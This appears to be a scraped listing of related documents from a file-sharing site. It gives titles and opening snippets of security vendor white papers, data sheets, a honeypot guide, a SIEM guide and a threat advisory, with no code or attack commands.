More informationThe Hillstone and Trend Micro Joint Solution
The Hillstone and Trend Micro Joint Solution Advanced Threat Defense Platform Overview Hillstone and Trend Micro offer a joint solution the Advanced Threat Defense Platform by integrating the industry
More informationHoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
More informationIBM Protocol Analysis Module
IBM Protocol Analysis Module The protection engine inside the IBM Security Intrusion Prevention System technologies. Highlights Stops threats before they impact your network and the assets on your network
More informationSOURCEFIRE RNA (REAL-TIME NETWORK AWARENESS)
SOURCEFIRE RNA (REAL-TIME NETWORK AWARENESS) DEALING WITH DYNAMIC THREATS INTRODUCTION The Maginot Line is considered to be one of the greatest failures of military history. It is a line of fortifications,
More informationDatabase Security in Virtualization and Cloud Computing Environments
White Paper Database Security in Virtualization and Cloud Computing Environments Three key technology challenges in protecting sensitive data Table of Contents Securing Information in Virtualization and
More informationEnd-user Security Analytics Strengthens Protection with ArcSight
Case Study for XY Bank End-user Security Analytics Strengthens Protection with ArcSight INTRODUCTION Detect and respond to advanced persistent threats (APT) in real-time with Nexthink End-user Security
More informationTotal Protection for Compliance: Unified IT Policy Auditing
Total Protection for Compliance: Unified IT Policy Auditing McAfee Total Protection for Compliance Regulations and standards are growing in number, and IT audits are increasing in complexity and cost.
More informationThe SIEM Evaluator s Guide
Using SIEM for Compliance, Threat Management, & Incident Response Security information and event management (SIEM) tools are designed to collect, store, analyze, and report on log data for threat detection,
More informationDeciphering and Mitigating Blackhole Spam from Email-borne Threats
Deciphering and Mitigating Blackhole Spam from Email-borne Threats Samir Patil Symantec Deciphering and Mitigating Blackhole Spam from Email-borne Threats 1 Outline 1 Background 2 Detection Challenges
More informationSecurity Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network
More informationAdaptive IPS Security in a changing world. Dave Venman Security Engineer, UK & Ireland
Adaptive IPS Security in a changing world Dave Venman Security Engineer, UK & Ireland 2 Who Is Sourcefire? Mission: To help customers manage increasing risks and regulations by providing the most effective,
More informationSECURITY TERMS: Advisory Backdoor - Blended Threat Blind Worm Bootstrapped Worm Bot Coordinated Scanning
SECURITY TERMS: Advisory - A formal notice to the public on the nature of security vulnerability. When security researchers discover vulnerabilities in software, they usually notify the affected vendor
More informationContext Threat Intelligence
Context Threat Intelligence Threat Advisory The Monju Incident Context Ref. Author TA10009 Context Threat Intelligence (CTI) Date 27/01/2014 Tel +44 (0) 20 7537 7515 Fax +44 (0) 20 7537 1071 Email threat@contextis.co.uk
More informationNetwork Instruments white paper
Network Instruments white paper USING A NETWORK ANALYZER AS A SECURITY TOOL Network Analyzers are designed to watch the network, identify issues and alert administrators of problem scenarios. These features
More informationAPPLICATION PROGRAMMING INTERFACE
DATA SHEET Advanced Threat Protection INTRODUCTION Customers can use Seculert s Application Programming Interface (API) to integrate their existing security devices and applications with Seculert. With
More informationHow To Buy Nitro Security
McAfee Acquires NitroSecurity McAfee announced that it has closed the acquisition of privately owned NitroSecurity. 1. Who is NitroSecurity? What do they do? NitroSecurity develops high-performance security
More informationAddressing APTs and Modern Malware with Security Intelligence Date: September 2013 Author: Jon Oltsik, Senior Principal Analyst
ESG Brief Addressing APTs and Modern Malware with Security Intelligence Date: September 2013 Author: Jon Oltsik, Senior Principal Analyst Abstract: APTs first came on the scene in 2010, creating a wave
More information